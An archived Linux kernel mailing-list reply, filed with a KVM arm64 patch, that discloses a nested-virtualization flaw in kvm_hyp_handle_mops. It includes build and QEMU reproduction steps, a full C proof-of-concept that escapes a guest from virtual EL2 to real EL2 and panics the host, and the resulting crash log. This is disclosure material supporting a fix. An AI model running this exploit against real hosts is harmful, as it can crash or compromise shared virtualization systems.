All of lore.kernel.org
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: Marc Zyngier <maz@kernel.org>, Oliver Upton <oupton@kernel.org>,
	 Catalin Marinas <catalin.marinas@arm.com>,
	Will Deacon <will@kernel.org>
Cc: Joey Gouly <joey.gouly@arm.com>,
	Steffen Eiden <seiden@linux.ibm.com>,
	 Suzuki K Poulose <suzuki.poulose@arm.com>,
	Zenghui Yu <yuzenghui@huawei.com>,
	 Andrew Morton <akpm@linux-foundation.org>,
	Jakub Kicinski <kuba@kernel.org>,
	 Bjorn Andersson <andersson@kernel.org>,
	Mark Rutland <mark.rutland@arm.com>,
	 Kristina Martsenko <kristina.martsenko@arm.com>,
	linux-arm-kernel@lists.infradead.org, kvmarm@lists.linux.dev,
	 Zhong Wang <wangzhong.c0ss4ck@bytedance.com>,
	Xuanqing Shi <shixuanqing.11@bytedance.com>
Subject: Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
Date: Tue, 16 Jun 2026 20:03:55 +0800	[thread overview]
Message-ID: <ajE4lHQevXNHpl1M@Air.local> (raw)
In-Reply-To: <20260616114943.81188-2-bestswngs@gmail.com>



Reproduction Steps:

1. prepare arm64 kernel image

```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs

3. boot qemu with the kernel iamge

```
qemu-system-aarch64 \
    -machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
    -smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
    -append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
    -nographic -no-reboot
```

PoC:

```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build:  aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run:    sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>


#define KVM_ARM_VCPU_HAS_EL2  7


#define PSR_MODE_EL1h  0x00000005
#define PSR_MODE_EL2h  0x00000009


#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n)    ARM64_CORE_REG((n) * 2)
#define REG_SP      ARM64_CORE_REG(62)
#define REG_PC      ARM64_CORE_REG(64)
#define REG_PSTATE  ARM64_CORE_REG(66)


#define GUEST_MEM_SIZE   (64 * 1024 * 1024)
#define GUEST_CODE_ADDR  0x40000000ULL
#define GUEST_STACK_TOP  (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR        0x10000000ULL


static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
   struct kvm_one_reg r = { .id = id, .addr = (uint64_t)&val };
   return ioctl(fd, KVM_SET_ONE_REG, &r);
}


static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
   struct kvm_one_reg r = { .id = id, .addr = (uint64_t)val };
   return ioctl(fd, KVM_GET_ONE_REG, &r);
}


static void die(const char *msg) { perror(msg); exit(1); }


/*
* Guest code (runs at virtual EL2h).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Layout (offsets from GUEST_CODE_ADDR):
*   +0x00  setup x0,x1,x2,x3
*   +0x10  movz x9, #0
*   +0x14  mrs x10, CurrentEL         ; record EL before
*   +0x18  str x10, [x3]              ; MMIO exit #1
*   +0x1C  b +16                      ; jump to cpyp at +0x2C
*   +0x20  nop
*   +0x24  nop
*   +0x28  mrs x11, CurrentEL         ; <-- RESET LANDS HERE (0x30-8)
*   +0x2C  cpyp [x0]!, [x1]!, x2!
*   +0x30  cpye [x0]!, [x1]!, x2!    ; EC_MOPS trap
*   +0x34  str x11, [x3]              ; MMIO exit #2 (after 2nd pass)
*   +0x38  b .                        ; done
*/
static const uint32_t guest_code[] = {
   0xd2a80200,  /* +0x00  movz x0, #0x4010, lsl #16  (dest = 0x40100000) */
   0xd2a80401,  /* +0x04  movz x1, #0x4020, lsl #16  (src  = 0x40200000) */
   0xd2a00202,  /* +0x08  movz x2, #0x10, lsl #16    (size = 1MB) */
   0xd2a20003,  /* +0x0C  movz x3, #0x1000, lsl #16  (MMIO = 0x10000000) */
   0xd2800009,  /* +0x10  movz x9, #0 */
   0xd538424a,  /* +0x14  mrs x10, CurrentEL */
   0xf900006a,  /* +0x18  str x10, [x3] */
   0x14000004,  /* +0x1C  b +16 -> +0x2C */
   0xd503201f,  /* +0x20  nop */
   0xd503201f,  /* +0x24  nop */
   0xd538424b,  /* +0x28  mrs x11, CurrentEL (AFTER eret) */
   0x1d010440,  /* +0x2C  cpyp [x0]!, [x1]!, x2! */
   0x1d810440,  /* +0x30  cpye [x0]!, [x1]!, x2! -> EC_MOPS */
   0xf900006b,  /* +0x34  str x11, [x3] */
   0x14000000,  /* +0x38  b . */
};


int main(void)
{
   int kvm_fd, vm_fd, vcpu_fd, ret;
   struct kvm_vcpu_init vcpu_init = {};
   struct kvm_run *run;
   void *guest_mem;


   setbuf(stdout, NULL);
   setbuf(stderr, NULL);


   printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
   printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");


   kvm_fd = open("/dev/kvm", O_RDWR);
   if (kvm_fd < 0) die("open /dev/kvm");


   vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
   if (vm_fd < 0) die("KVM_CREATE_VM");


   /* Guest memory */
   guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (guest_mem == MAP_FAILED) die("mmap");


   struct kvm_userspace_memory_region region = {
       .slot = 0,
       .guest_phys_addr = GUEST_CODE_ADDR,
       .memory_size = GUEST_MEM_SIZE,
       .userspace_addr = (uint64_t)guest_mem,
   };
   if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &region) < 0)
       die("KVM_SET_USER_MEMORY_REGION");


   memcpy(guest_mem, guest_code, sizeof(guest_code));


   /* Create vCPU with nested virtualization */
   vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
   if (vcpu_fd < 0) die("KVM_CREATE_VCPU");


   if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
       die("KVM_ARM_PREFERRED_TARGET");


   vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2);
   if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
       perror("KVM_ARM_VCPU_INIT with HAS_EL2");
       printf("[-] Nested virtualization not supported.\n");
       return 1;
   }
   printf("[+] vCPU created with nested virt (NV)\n");


   /* GICv3 (required before KVM_RUN) */
   {
       struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
       if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
           die("KVM_CREATE_DEVICE GICv3");


       uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
       struct kvm_device_attr attr = {
           .group = KVM_DEV_ARM_VGIC_GRP_ADDR,
           .attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
           .addr = (uint64_t)&dist,
       };
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
       attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
       attr.addr = (uint64_t)&redist;
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);


       attr = (struct kvm_device_attr){
           .group = KVM_DEV_ARM_VGIC_GRP_CTRL,
           .attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
       };
       ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
       printf("[+] GICv3 initialized\n");
   }


   /* Set vCPU state: start at virtual EL2h */
   kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR);
   kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP);
   if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
       printf("[!] Cannot set EL2h, falling back to EL1h\n");
       kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h);
   }
   printf("[+] vCPU: PC=0x%llx PSTATE=EL2h SP=0x%llx\n",
          (unsigned long long)GUEST_CODE_ADDR,
          (unsigned long long)GUEST_STACK_TOP);


   /* Map kvm_run */
   int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
   run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0);
   if (run == MAP_FAILED) die("mmap vcpu");


   /* Execute guest */
   printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");


   int mmio_count = 0;
   uint64_t el_before = 0, el_after = 0;


   for (int i = 0; i < 100; i++) {
       ret = ioctl(vcpu_fd, KVM_RUN, 0);
       if (ret < 0) {
           printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
           break;
       }


       switch (run->exit_reason) {
       case KVM_EXIT_MMIO:
           if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
               uint64_t val = 0;
               memcpy(&val, run->mmio.data, run->mmio.len);
               mmio_count++;
               printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
                      mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3);
               if (mmio_count == 1) el_before = (val >> 2) & 3;
               if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; }
           }
           break;


       case KVM_EXIT_INTERNAL_ERROR:
           printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
           goto done;


       case KVM_EXIT_FAIL_ENTRY:
           printf("[-] FAIL_ENTRY: 0x%llx\n",
                  (unsigned long long)run->fail_entry.hardware_entry_failure_reason);
           goto done;


       default:
           printf("[*] exit_reason=%d (iter %d)\n", run->exit_reason, i);
           break;
       }
   }
   printf("[-] Max iterations reached without result.\n");
   goto done;


results:
   printf("\n========== RESULTS ==========\n");
   printf("  EL before MOPS: EL%lld\n", (long long)el_before);
   printf("  EL after  MOPS: EL%lld\n", (long long)el_after);
   printf("=============================\n\n");


   if (el_after > el_before)
       printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
              (long long)el_before, (long long)el_after);
   else
       printf("[+] No escalation observed in guest registers.\n");


done:
   printf("\n[*] Check dmesg for HYP panic:\n");
   printf("    dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
   printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");


   close(vcpu_fd);
   close(vm_fd);
   close(kvm_fd);
   munmap(guest_mem, GUEST_MEM_SIZE);
   munmap(run, run_size);
   return 0;
}

```

crash log

```
========== FatalMOPS dynamic test (L1 host) ==========
  [*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
  [+] /dev/kvm present
  [*] dmesg nested-virt lines:
  [*] launching /poc ...
  [*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
  [+] vCPU created with nested virt (HAS_EL2)
  [+] GICv3 initialized
  [+] vCPU starts at virtual EL2h
  [*] Running guest. Vulnerable kernel -> HYP panic expected.
  [+] MMIO #1: CurrentEL=EL2
  [    3.326956] Kernel panic - not syncing: HYP panic:
  [    3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
  [    3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  [    3.326956] VCPU:000000006f4e5727
  [    3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  [    3.349460] Hardware name: linux,dummy-virt (DT)
  [    3.353136] Call trace:
  [    3.355241]  show_stack+0x18/0x24 (C)
  [    3.358652]  dump_stack_lvl+0x34/0x8c
  [    3.361515]  dump_stack+0x18/0x24
  [    3.364085]  vpanic+0x47c/0x4dc
  [    3.366527]  do_panic_on_target_cpu+0x0/0x1c
  [    3.369782]  kvm_unexpected_el2_exception+0x0/0x3c0
  [    3.373494]  hyp_panic+0x0/0x80
  [    3.375940]  kvm_arm_vcpu_enter_exit+0x64/0x94
  [    3.379372]  kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
  [    3.382919]  kvm_vcpu_ioctl+0x174/0xa38
  [    3.385894]  __arm64_sys_ioctl+0xac/0x104
  [    3.389105]  invoke_syscall+0x54/0x10c
  [    3.392015]  el0_svc_common.constprop.0+0x40/0xe0
  [    3.395653]  do_el0_svc+0x1c/0x28
  [    3.398236]  el0_svc+0x38/0x11c
  [    3.400681]  el0t_64_sync_handler+0xa0/0xe4
  [    3.403872]  el0t_64_sync+0x198/0x19c
  [    3.407083] SMP: stopping secondary CPUs
  [    3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
  [    3.415585] PHYS_OFFSET: 0x40000000
  [    3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
  [    3.423170] Memory Limit: none
```

after decode

```
  Kernel panic - not syncing: HYP panic:
  PS:00000009 PC:0000000040000028 ESR:86000005
  FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  VCPU:000000006f4e5727
  CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  Call trace:
   show_stack                   (arch/arm64/kernel/stacktrace.c:499)
   dump_stack_lvl               (lib/dump_stack.c:94 120)
   dump_stack                   (lib/dump_stack.c:129)
   vpanic                       (kernel/panic.c:650)
   do_panic_on_target_cpu       (kernel/panic.c:341)
   kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
                                 → arch/arm64/kvm/hyp/vhe/switch.c:688)
   hyp_panic                    (arch/arm64/kvm/hyp/vhe/switch.c:678)
   kvm_arm_vcpu_enter_exit      (arch/arm64/kvm/arm.c:1227)
   kvm_arch_vcpu_ioctl_run      (arch/arm64/kvm/arm.c:1324)
   kvm_vcpu_ioctl               (virt/kvm/kvm_main.c:4470)
   __arm64_sys_ioctl            (fs/ioctl.c:51 597 583)
   invoke_syscall               (arch/arm64/kernel/syscall.c:35 49)
   el0_svc_common.constprop.0   (arch/arm64/kernel/syscall.c:121)
   do_el0_svc                   (arch/arm64/kernel/syscall.c:140)
   el0_svc                      (arch/arm64/kernel/entry-common.c:740)
   el0t_64_sync_handler         (arch/arm64/kernel/entry-common.c:759)
   el0t_64_sync                 (arch/arm64/kernel/entry.S:594)
```



  reply	other threads:[~2026-06-16 12:04 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi [this message]
2026-06-16 20:14 ` Oliver Upton

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=ajE4lHQevXNHpl1M@Air.local \
    --to=bestswngs@gmail.com \
    --cc=akpm@linux-foundation.org \
    --cc=andersson@kernel.org \
    --cc=catalin.marinas@arm.com \
    --cc=joey.gouly@arm.com \
    --cc=kristina.martsenko@arm.com \
    --cc=kuba@kernel.org \
    --cc=kvmarm@lists.linux.dev \
    --cc=linux-arm-kernel@lists.infradead.org \
    --cc=mark.rutland@arm.com \
    --cc=maz@kernel.org \
    --cc=oupton@kernel.org \
    --cc=seiden@linux.ibm.com \
    --cc=shixuanqing.11@bytedance.com \
    --cc=suzuki.poulose@arm.com \
    --cc=wangzhong.c0ss4ck@bytedance.com \
    --cc=will@kernel.org \
    --cc=yuzenghui@huawei.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.